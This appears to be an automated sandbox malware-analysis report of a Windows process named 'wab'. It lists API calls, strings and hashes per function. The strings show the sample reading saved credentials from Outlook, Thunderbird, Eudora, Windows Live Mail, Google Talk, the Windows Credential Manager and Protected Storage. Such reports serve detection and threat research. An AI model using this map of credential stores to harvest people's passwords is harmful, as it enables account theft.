410983 memset _itoa WritePrivateProfileStringA 32910->32914 32911->32908 32913 410a84 32913->32908 32914->32913 34154 434395 16 API calls 33968 441d9c memcmp 34156 43f79b 119 API calls 33969 40c599 43 API calls 34157 426741 87 API calls 33973 4401a6 21 API calls 33975 426da6 memcpy memset memset memcpy 33976 4335a5 15 API calls 33978 4299ab memset memset memcpy memset memset 33979 40b1ab 8 API calls 34162 425115 76 API calls __fprintf_l 34166 4113b2 18 API calls 2 library calls 34170 40a3b8 memset sprintf SendMessageA 32920 410bbc 32923 4109cf 32920->32923 32924 4109dc 32923->32924 32925 410a23 memset GetPrivateProfileStringA 32924->32925 32926 4109ea memset 32924->32926 32931 407646 strlen 32925->32931 32936 4075cd sprintf memcpy 32926->32936 32929 410a0c WritePrivateProfileStringA 32930 410a65 32929->32930 32932 40765a 32931->32932 32934 40765c 32931->32934 32932->32930 32933 4076a3 32933->32930 32934->32933 32937 40737c strtoul 32934->32937 32936->32929 32937->32934 33981 40b5bf memset memset _mbsicmp

                    Control-flow Graph

                    APIs
                    • memset.MSVCRT ref: 0040832F
                    • memset.MSVCRT ref: 00408343
                    • memset.MSVCRT ref: 0040835F
                    • memset.MSVCRT ref: 00408376
                    • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                    • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                    • strlen.MSVCRT ref: 004083E9
                    • strlen.MSVCRT ref: 004083F8
                    • memcpy.MSVCRT ref: 0040840A
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                    • String ID: 5$H$O$b$i$}$}
                    • API String ID: 1832431107-3760989150
                    • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                    • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                    • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                    • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                    Control-flow Graph

                    APIs
                    • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                    • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                    • strlen.MSVCRT ref: 00407F5C
                    • strlen.MSVCRT ref: 00407F64
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileFindstrlen$FirstNext
                    • String ID: ACD
                    • API String ID: 379999529-620537770
                    • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                    • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                    • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                    • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                    Control-flow Graph

                    APIs
                    • memset.MSVCRT ref: 00401E8B
                    • strlen.MSVCRT ref: 00401EA4
                    • strlen.MSVCRT ref: 00401EB2
                    • strlen.MSVCRT ref: 00401EF8
                    • strlen.MSVCRT ref: 00401F06
                    • memset.MSVCRT ref: 00401FB1
                    • atoi.MSVCRT ref: 00401FE0
                    • memset.MSVCRT ref: 00402003
                    • sprintf.MSVCRT ref: 00402030
                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                    • memset.MSVCRT ref: 00402086
                    • memset.MSVCRT ref: 0040209B
                    • strlen.MSVCRT ref: 004020A1
                    • strlen.MSVCRT ref: 004020AF
                    • strlen.MSVCRT ref: 004020E2
                    • strlen.MSVCRT ref: 004020F0
                    • memset.MSVCRT ref: 00402018
                      • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                    • _mbscpy.MSVCRT ref: 00402177
                    • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                    • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                    • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                    • API String ID: 1846531875-4223776976
                    • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                    • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                    • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                    • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                      • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                      • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                      • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                    • DeleteObject.GDI32(?), ref: 0040D1A6
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                    • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                    • API String ID: 745651260-375988210
                    • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                    • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                    • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                    • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                    Control-flow Graph

                    APIs
                      • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                    • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                    • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                    • _mbscpy.MSVCRT ref: 00403E54
                    Strings
                    • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                    • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                    • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                    • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                    • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                    • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                    • pstorec.dll, xrefs: 00403C30
                    • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                    • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                    • PStoreCreateInstance, xrefs: 00403C44
                    • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$AddressFreeLoadProc_mbscpy
                    • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                    • API String ID: 1197458902-317895162
                    • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                    • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                    • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                    • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                    Control-flow Graph

                    APIs
                    • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                    • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                    • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                    • memcpy.MSVCRT ref: 0040FBE4
                    • memcpy.MSVCRT ref: 0040FBF9
                      • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                      • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                      • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                      • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                    • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                    • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                    • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                    • API String ID: 2768085393-2409096184
                    • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                    • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                    • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                    • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                    • String ID:
                    • API String ID: 3662548030-0
                    • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                    • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                    • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                    • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                    Control-flow Graph

                    APIs
                    • memset.MSVCRT ref: 0044430B
                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                      • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                      • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                      • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                      • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                    • memset.MSVCRT ref: 00444379
                    • memset.MSVCRT ref: 00444394
                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                    • ExpandEnvironmentStringsA.KERNELBASE(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                    • strlen.MSVCRT ref: 004443DB
                    • _strcmpi.MSVCRT ref: 00444401
                    Strings
                    • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                    • \Microsoft\Windows Mail, xrefs: 00444329
                    • \Microsoft\Windows Live Mail, xrefs: 00444350
                    • Store Root, xrefs: 004443A5
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                    • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                    • API String ID: 832325562-2578778931
                    • Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                    • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                    • Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                    • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                    Control-flow Graph

                    APIs
                    • memset.MSVCRT ref: 0040F567
                    • memset.MSVCRT ref: 0040F57F
                      • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                    • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                    • memcpy.MSVCRT ref: 0040F652
                    • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                    • String ID:
                    • API String ID: 2012582556-3916222277
                    • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                    • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                    • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                    • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                    Control-flow Graph

                    APIs
                      • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                    • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,?,?), ref: 0040F9CB
                    • memset.MSVCRT ref: 0040FA1E
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                    • _strnicmp.MSVCRT ref: 0040FA4F
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$CredEnumerateVersion_strnicmpmemset
                    • String ID: WindowsLive:name=*$windowslive:name=
                    • API String ID: 4107456500-3589380929
                    • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                    • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                    • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                    • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66

                    Control-flow Graph for function 4037ca-4038e5 (graph rendering omitted)
                    APIs
                    • memset.MSVCRT ref: 004037EB
                    • memset.MSVCRT ref: 004037FF
                      • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                      • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                      • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                    • strchr.MSVCRT ref: 0040386E
                    • _mbscpy.MSVCRT ref: 0040388B
                    • strlen.MSVCRT ref: 00403897
                    • sprintf.MSVCRT ref: 004038B7
                    • _mbscpy.MSVCRT ref: 004038CD
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                    • String ID: %s@yahoo.com
                    • API String ID: 317221925-3288273942
                    • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                    • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                    • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                    • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                    Control-flow Graph for function 4034e4-403582 (graph rendering omitted)
                    APIs
                    • memset.MSVCRT ref: 00403504
                    • memset.MSVCRT ref: 0040351A
                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                    • _mbscpy.MSVCRT ref: 00403555
                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                    • _mbscat.MSVCRT ref: 0040356D
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscatmemset$Close_mbscpystrlen
                    • String ID: InstallPath$Software\Group Mail$fb.dat
                    • API String ID: 3071782539-966475738
                    • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                    • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                    • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                    • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                    Control-flow Graph for function 40ccd7-40cdd9 (graph rendering omitted)
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                    • String ID:
                    • API String ID: 2054149589-0
                    • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                    • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                    • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                    • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                    Control-flow Graph (graph rendering omitted)
                    APIs
                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                      • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                      • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                    • memset.MSVCRT ref: 00408620
                      • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                    • memset.MSVCRT ref: 00408671
                    • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                    • RegCloseKey.ADVAPI32(?), ref: 004086D6
                    Strings
                    • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                    • String ID: Software\Google\Google Talk\Accounts
                    • API String ID: 1366857005-1079885057
                    • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                    • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                    • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                    • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                    Control-flow Graph for function 40ba28-40bb09 (graph rendering omitted)
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Cursor_mbsicmpqsort
                    • String ID: /nosort$/sort
                    • API String ID: 882979914-1578091866
                    • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                    • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                    • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                    • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                    APIs
                      • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                      • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                    • memset.MSVCRT ref: 00410E10
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                    • _mbscpy.MSVCRT ref: 00410E87
                      • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                    Strings
                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                    • API String ID: 889583718-2036018995
                    • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                    • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                    • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                    • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                    APIs
                    • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                    • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                    • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                    • LockResource.KERNEL32(00000000), ref: 00410CA1
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Resource$FindLoadLockSizeof
                    • String ID:
                    • API String ID: 3473537107-0
                    • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                    • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                    • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                    • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                    APIs
                    • memset.MSVCRT ref: 004109F7
                      • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                      • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                    • memset.MSVCRT ref: 00410A32
